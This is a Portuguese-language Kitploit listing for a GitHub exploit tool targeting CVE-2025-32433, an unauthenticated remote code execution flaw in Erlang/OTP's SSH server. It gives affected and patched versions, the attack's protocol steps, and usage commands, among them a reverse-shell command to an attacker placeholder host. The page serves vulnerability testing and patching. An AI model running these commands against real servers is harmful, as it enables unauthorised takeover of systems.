Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32433-Exploit-edited — Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility | Kitploit
Ferramentas/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRed TeamingRemote Access Tool
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 2 mesesAinda não revisado

Exploração CVE-2025-32433 (Compatível com Windows)

Execução Remota de Código não Autenticada no SSH do Erlang/OTP

Descrição

Este repositório contém uma exploração para CVE-2025-32433, uma vulnerabilidade crítica de execução remota de código não autenticada no servidor SSH do Erlang/OTP.

Características principais:

  • ✅ Exploração RCE pré-autenticação
  • ✅ Corrigido para compatibilidade com codificação GBK do Windows
  • ✅ Funciona em versões do Erlang/OTP ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

Detalhes da Vulnerabilidade

ID CVE: CVE-2025-32433
Gravidade: Crítica
Impacto: Execução Remota de Código não Autenticada

A vulnerabilidade permite que atacantes executem comandos arbitrários do sistema em servidores SSH do Erlang/OTP sem autenticação, enviando mensagens de protocolo SSH especialmente criadas.

Versões Afetadas

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 e mais antigas (provável)

Uso

root@kitploit:~
# Execução básica de comando
python exploit.py -t <ip-alvo> -p 2222 -c "whoami"

# Executar comando do sistema
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Execução de código Erlang bruto
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Shell reverso
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/SEU_IP/4444 0>&1"

Argumentos

root@kitploit:~
-t, --target    Endereço IP do alvo (padrão: 127.0.0.1)
-p, --port      Porta do alvo (padrão: 2222)
-c, --command   Comando do sistema a executar
-e, --erlang    Código Erlang bruto a executar

Correção de Codificação para Windows

Esta versão corrige o problema de codificação presente na exploração original:

Problema: A exploração original usava o caractere de marca de verificação Unicode (✓, U+2713) que causa erros de codificação GBK no Windows:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

Solução: Substituiu o caractere Unicode pelo caractere ASCII padrão + para compatibilidade entre plataformas.

Detalhes Técnicos

A exploração funciona:

  1. Estabelecendo conexão SSH e troca de banner
  2. Enviando pacote SSH_MSG_KEXINIT
  3. Abrindo canal SSH com SSH_MSG_CHANNEL_OPEN
  4. Enviando SSH_MSG_CHANNEL_REQUEST com comando exec malicioso antes da autenticação
  5. Executando código Erlang arbitrário via os:cmd()

Referências

  • Aviso de Segurança do GitHub
  • Correção do Commit do Erlang/OTP
  • RFC 4254 - Protocolo de Conexão SSH
  • ProDefense CVE-2025-32433

Versões Corrigidas

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

Aviso Legal

Esta exploração é fornecida apenas para fins educacionais e de teste de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Use com responsabilidade e apenas em sistemas para os quais você tenha permissão explícita para testar.

Licença

Licença MIT

Autor

Modificado para compatibilidade com Windows por chuzouX

Baixar ferramenta